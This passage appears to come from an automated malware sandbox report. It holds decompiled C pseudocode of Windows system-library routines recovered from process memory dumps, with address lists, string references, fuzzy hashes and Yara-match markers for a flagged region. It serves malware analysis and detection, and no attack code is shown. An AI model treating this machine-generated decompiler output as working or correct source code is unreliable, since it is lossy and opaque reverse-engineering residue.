								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E1E3EF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E1E3E95D0();
										L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x1e3df0d3
0x1e3df0d9
0x1e3df0e0
0x1e3df0e7
0x1e3df0f2
0x1e3df0f4
0x1e3df0f8
0x1e3df100
0x1e3df108
0x1e3df10d
0x1e3df115
0x1e3df116
0x1e3df11f
0x1e3df123
0x1e3df124
0x1e3df12c
0x1e3df130
0x1e3df134
0x1e3df13d
0x1e3df144
0x1e3df14b
0x1e3df152
0x1e41bab0
0x1e41bab0
0x1e3df158
0x1e3df158
0x1e3df15a
0x1e3df160
0x1e3df165
0x1e3df166
0x1e3df16f
0x1e3df173
0x1e41baa7
0x1e41baa7
0x1e41baab
0x00000000
0x1e3df179
0x1e3df18d
0x1e3df191
0x1e41baa2
0x00000000
0x1e3df197
0x1e3df19b
0x1e3df1a2
0x1e3df1a9
0x1e3df1af
0x1e3df1b2
0x1e3df1b6
0x1e3df1b9
0x1e3df1c4
0x1e3df1d8
0x1e3df1df
0x1e3df1e3
0x1e3df1eb
0x1e3df1ee
0x1e3df1f4
0x1e3df20f
0x1e41bab7
0x1e41babb
0x1e41bacc
0x1e41bad1
0x1e3df215
0x1e3df218
0x1e3df226
0x1e3df22b
0x00000000
0x1e3df22b
0x1e3df1f6
0x1e3df1f6
0x1e3df1f9
0x1e3df1fb
0x1e3df1fb
0x1e3df1f4
0x1e3df191
0x1e3df173
0x1e3df152
0x1e3df203

Strings

@, xrefs: 1E3DF124

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: a41d260a579e11117cc5c244c20bf6d73162bc871482a81f7ebf09bbcf6fb6ca
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: C3519F76504750AFC321CF29C840A6BBBF8FF88750F008A2EF99597690E7B4E954CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1E423540, Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E1E423540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x1e49d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E1E3E0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E1E423706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E1E3EFA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E1E423540;
						E1E3EFA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E1E3FDDD0( &_v1072, _t75, _t79, _t80, _t81);
						E1E430C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E1E3E97C0();
					}
					return E1E3EB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E1E423971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E1E423884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E1E3EFA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E1E3E9650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E1E423787(_a4,  &_v352, _t80);
						}
					}
					L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E1E3E95D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x1e423552
0x1e42355a
0x1e42355d
0x1e423566
0x1e423567
0x1e42357e
0x1e42358f
0x1e4235a1
0x1e4235a5
0x1e42366b
0x1e42366b
0x1e42366d
0x1e423672
0x1e423679
0x1e423685
0x1e42368d
0x1e42369d
0x1e4236a7
0x1e4236b8
0x1e4236c6
0x1e4236c7
0x1e4236dc
0x1e4236e1
0x1e4236e7
0x1e4236e9
0x1e4236e9
0x1e423703
0x1e423703
0x1e4235b5
0x1e4235c0
0x1e4235c4
0x00000000
0x00000000
0x1e4235ca
0x1e4235d7
0x1e4235e2
0x1e4235e6
0x1e4235e8
0x1e4235f5
0x1e4235fa
0x1e423603
0x1e423604
0x1e423609
0x1e42360a
0x1e423612
0x1e423613
0x1e42361e
0x1e423622
0x1e423628
0x1e42362f
0x1e42362f
0x1e423636
0x1e423638
0x1e42363b
0x1e423642
0x1e423642
0x1e423636
0x1e423657
0x1e423657
0x1e42365c
0x1e423662
0x1e423669
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 1E42358F

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: dea23df1717b8dc451d0608d5333c927fd2721ae27c7c99dffcfd02144d27f6a
Instruction ID: 7e9470d5e4bce443a61ab7356494b44766f6a6f7a62757c5e0e8346e689e8a16
Opcode Fuzzy Hash: dea23df1717b8dc451d0608d5333c927fd2721ae27c7c99dffcfd02144d27f6a
Instruction Fuzzy Hash: B34133F5D0056E9ADB21CA50DC80F9EB77CAF44714F4046E6EA09AB240DB30AE898F94

Uniqueness

Uniqueness Score: -1.00%

Function 1E4705AC, Relevance: 1.4, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E1E4705AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E1E4707DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E1E3E9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E1E46A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E1E46A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E1E471293(_t79, _v40, E1E4707DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E1E3C7D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E1E46138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

0x1e4705c5
0x1e4705ca
0x1e4705d3
0x1e4706db
0x1e4706db
0x1e4706dd
0x1e4706e3
0x1e4706e3
0x1e4705dd
0x1e4705e7
0x1e4705f6
0x1e470600
0x1e470607
0x1e470610
0x1e470615
0x1e47061a
0x1e47061c
0x1e47061e
0x1e470624
0x1e470625
0x1e470627
0x1e470628
0x1e470631
0x1e470640
0x1e47064d
0x1e470654
0x1e470654
0x1e470631
0x1e47066d
0x1e470674
0x00000000
0x00000000
0x1e470692
0x1e47069e
0x1e4706b0
0x1e4706a0
0x1e4706a9
0x1e4706a9
0x1e4706b8
0x1e4706d6
0x1e4706d6
0x00000000

Strings

`, xrefs: 1E470633

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: b187af6233c0be9ca915c5d60af70e2872b5d0aeea45b1eaf61dbf23366eae0a
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: BB31F176A083456BE710CE25CC94F9B77DAABC4754F04472AFA58EB280D770E904CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 1E423884, Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E1E423884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E1E3E9650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L1E3C4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E1E3E9650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x1e423893
0x1e423896
0x1e423899
0x1e42389f
0x1e4238a0
0x1e4238a4
0x1e4238a9
0x1e4238ac
0x1e4238ad
0x1e4238ae
0x1e4238af
0x1e4238b1
0x1e4238b4
0x1e4238bb
0x1e4238bc
0x1e4238bd
0x1e4238c4
0x1e4238c8
0x1e4238ca
0x1e4238ca
0x1e4238d5
0x1e42393e
0x1e423940
0x1e423942
0x1e423952
0x1e423954
0x1e423961
0x1e423961
0x1e423967
0x1e42396e
0x1e42396e
0x1e423947
0x1e42394c
0x00000000
0x1e42394c
0x1e4238ea
0x1e4238ee
0x1e4238f8
0x1e4238f9
0x1e4238ff
0x1e423900
0x1e423902
0x1e423903
0x1e42390b
0x1e42390f
0x1e423950
0x00000000
0x1e423950
0x1e423915
0x1e42391d
0x1e42391d
0x1e423922
0x1e423926
0x00000000
0x1e423928
0x1e42392b
0x1e42392b
0x1e423935
0x1e423937
0x1e423937
0x00000000
0x1e423935
0x1e423926
0x1e4238f0
0x00000000

Strings

BinaryName, xrefs: 1E4238B4

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 6b1f59b8d53a00eac63fa039735c4a71ccf50a6e9f899db3b0d6c84a2459a5c1
Instruction ID: a1aa95830d7112650245008e635416781560fde74618493e64b69dec0b38b826
Opcode Fuzzy Hash: 6b1f59b8d53a00eac63fa039735c4a71ccf50a6e9f899db3b0d6c84a2459a5c1
Instruction Fuzzy Hash: 79310376D0051BAFDB15CA59D945E6FB7B5EF81B20F42437AE854A7350D7309E00CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1E3DD294, Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E1E3DD294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x1e49d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E1E3C4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E1E3EB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E1E3E98D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E1E3E95D0();
					L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x1e3dd29c
0x1e3dd2a6
0x1e3dd2b1
0x1e3dd2b5
0x1e3dd2b6
0x1e3dd2bc
0x1e3dd2bd
0x1e3dd2be
0x1e3dd2bf
0x1e3dd2c2
0x1e3dd2c4
0x1e3dd2cc
0x1e3dd384
0x1e3dd34b
0x1e3dd34f
0x1e3dd350
0x1e3dd351
0x1e3dd35c
0x1e3dd35c
0x1e3dd2d6
0x1e3dd2da
0x1e3dd2e1
0x1e3dd361
0x1e3dd369
0x1e3dd36d
0x1e3dd2e3
0x1e3dd2e3
0x1e3dd2e3
0x1e3dd2e5
0x1e3dd2ed
0x1e3dd2f5
0x1e3dd2fa
0x1e3dd302
0x1e3dd303
0x1e3dd30b
0x1e3dd30f
0x1e3dd313
0x1e3dd318
0x1e3dd31c
0x1e3dd320
0x1e3dd379
0x1e3dd37d
0x00000000
0x00000000
0x1e41affe
0x1e41b001
0x1e41b011
0x00000000
0x1e3dd322
0x1e3dd322
0x1e3dd330
0x1e3dd337
0x1e3dd35d
0x1e3dd339
0x1e3dd33f
0x1e3dd38c
0x1e3dd38c
0x1e3dd33f
0x1e3dd349
0x00000000
0x1e3dd349

Strings

@, xrefs: 1E3DD303

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 2ef7b0aa10b4db177be5d174139d05cbce9b83a51663136853ed366f0028c7fc
Instruction ID: 4299395bde6a413f21a1a02b28615fc8c1b775718430f3eb38bee4fe8de464b9
Opcode Fuzzy Hash: 2ef7b0aa10b4db177be5d174139d05cbce9b83a51663136853ed366f0028c7fc
Instruction Fuzzy Hash: F9317FB6508345AFC311CF29C984A5BBBE9FF89654F800B2EF99493250D735ED09CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00567064, Relevance: 1.3, Strings: 1, Instructions: 90COMMON

Download Yara Rule

Strings

`, xrefs: 00567169

Memory Dump Source

Source File: 0000000A.00000002.486789978.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID:
String ID: `
API String ID: 0-1850852036
Opcode ID: 4ddf49b2100ab9c292523a1ec8d02aa9e4796747a9e45747a21460dccaf1d801
Instruction ID: e4c2993219336435d6fd4013a7516a64209bbd4b535169e08e8feec20713ec1b
Opcode Fuzzy Hash: 4ddf49b2100ab9c292523a1ec8d02aa9e4796747a9e45747a21460dccaf1d801
Instruction Fuzzy Hash: B011CEA850DA4ACEFB329018C9793DB3E9ADFC7378F718562DC0747563D21505C64A22

Uniqueness

Uniqueness Score: -1.00%

Function 1E3A9100, Relevance: 1.3, Strings: 1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E1E3A9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x1e47f6e8);
				E1E3FD0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E1E4788F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E1E3FD130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x1e4986c0; // 0x7007b0
				if(_t88 == 0 || _t82 ==  *0x1e4986b8 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E1E3C2280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E1E4788F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E1E3EAFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x1e49b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x1e4984c0;
										if(_t69 >=  *0x1e4984c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E1E479063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E1E3A922A(_t82);
							_t53 = E1E3C7D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E1E478B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x1e4986c0; // 0x7007b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x1e4986b8;
									if(__eflags == 0) {
										_t79 = 0x1e4986bc;
										_t72 = 0x1e4986b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E1E3A9240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x1e4986c4;
									_t72 = 0x1e4986c0;
									L18:
									E1E3D9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}

0x1e3a9100
0x1e3a9100
0x1e3a9100
0x1e3a9100
0x1e3a9102
0x1e3a9107
0x1e3a910c
0x1e3a9110
0x1e3a9115
0x1e3a9136
0x1e3a9143
0x1e4037e4
0x1e4037e4
0x1e3a9149
0x1e3a914e
0x1e3a914e
0x1e3a9117
0x1e3a911d
0x00000000
0x1e3a9151
0x1e3a9158
0x1e3a915d
0x1e3a9161
0x1e3a9168
0x1e403715
0x00000000
0x1e3a916e
0x1e3a916e
0x1e3a9175
0x1e3a9177
0x1e3a917e
0x1e3a917f
0x1e3a9182
0x1e3a9182
0x1e3a9187
0x1e3a9187
0x1e3a918a
0x1e3a918d
0x1e3a918f
0x1e3a9192
0x1e3a9195
0x1e3a9198
0x1e3a9198
0x1e3a9198
0x1e3a919a
0x00000000
0x00000000
0x1e40371f
0x1e403721
0x1e403727
0x1e40372f
0x1e403733
0x1e403735
0x1e403738
0x1e40373b
0x1e40373d
0x1e403740
0x00000000
0x00000000
0x1e403746
0x1e403749
0x00000000
0x00000000
0x1e40374f
0x1e403751
0x00000000
0x00000000
0x1e403757
0x1e403759
0x1e40375c
0x1e40375c
0x1e40375e
0x1e40375e
0x1e403761
0x1e403764
0x00000000
0x00000000
0x1e403766
0x1e403768
0x1e4037a3
0x1e4037a3
0x1e4037a5
0x1e4037a7
0x1e4037ad
0x1e4037b0
0x1e4037b2
0x1e4037bc
0x1e4037c2
0x1e4037c2
0x1e4037b2
0x1e3a9187
0x1e3a9187
0x1e3a918a
0x1e3a918d
0x1e3a918f
0x1e3a9192
0x1e3a9195
0x00000000
0x1e3a9195
0x00000000
0x1e3a9187
0x1e40376a
0x1e40376a
0x1e40376c
0x1e40376c
0x1e40376f
0x1e403775
0x00000000
0x00000000
0x1e403777
0x1e403779
0x00000000
0x00000000
0x1e403782
0x1e403787
0x1e403789
0x1e403790
0x1e403790
0x1e40378b
0x1e40378b
0x1e40378b
0x1e403792
0x1e403795
0x1e403795
0x1e403798
0x1e403798
0x1e40379b
0x1e40379b
0x1e3a91a3
0x1e3a91a9
0x1e3a91b0
0x1e3a91b4
0x1e3a91b4
0x1e3a91bb
0x1e3a91c0
0x1e3a91c5
0x1e3a91c7
0x1e4037da
0x1e3a91cd
0x1e3a91cd
0x1e3a91cd
0x1e3a91d2
0x1e3a91d5
0x1e3a9239
0x1e3a9239
0x1e3a91d7
0x1e3a91db
0x1e3a91e1
0x1e3a91e7
0x1e3a91fd
0x1e3a9203
0x1e3a921e
0x1e3a9223
0x00000000
0x1e3a9223
0x1e3a9205
0x1e3a9208
0x1e3a920c
0x1e3a9214
0x1e3a9214
0x1e3a91e9
0x1e3a91e9
0x1e3a91ee
0x1e3a91f3
0x1e3a91f3
0x1e3a91f3
0x1e3a91e7
0x00000000
0x1e3a91db
0x1e3a9187
0x1e3a9168

Strings

0]s, xrefs: 1E3A9223

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: 0]s
API String ID: 0-489897757
Opcode ID: 6042ed7dcf0e95ebbf301c079a27aa479f326eb568f9d6057baf7ae122d3d0bb
Instruction ID: fa503d3f5ed5a9e9c11558ae227e1469ddb7738a0eed8bdd76dfc3ef5ae22f79
Opcode Fuzzy Hash: 6042ed7dcf0e95ebbf301c079a27aa479f326eb568f9d6057baf7ae122d3d0bb
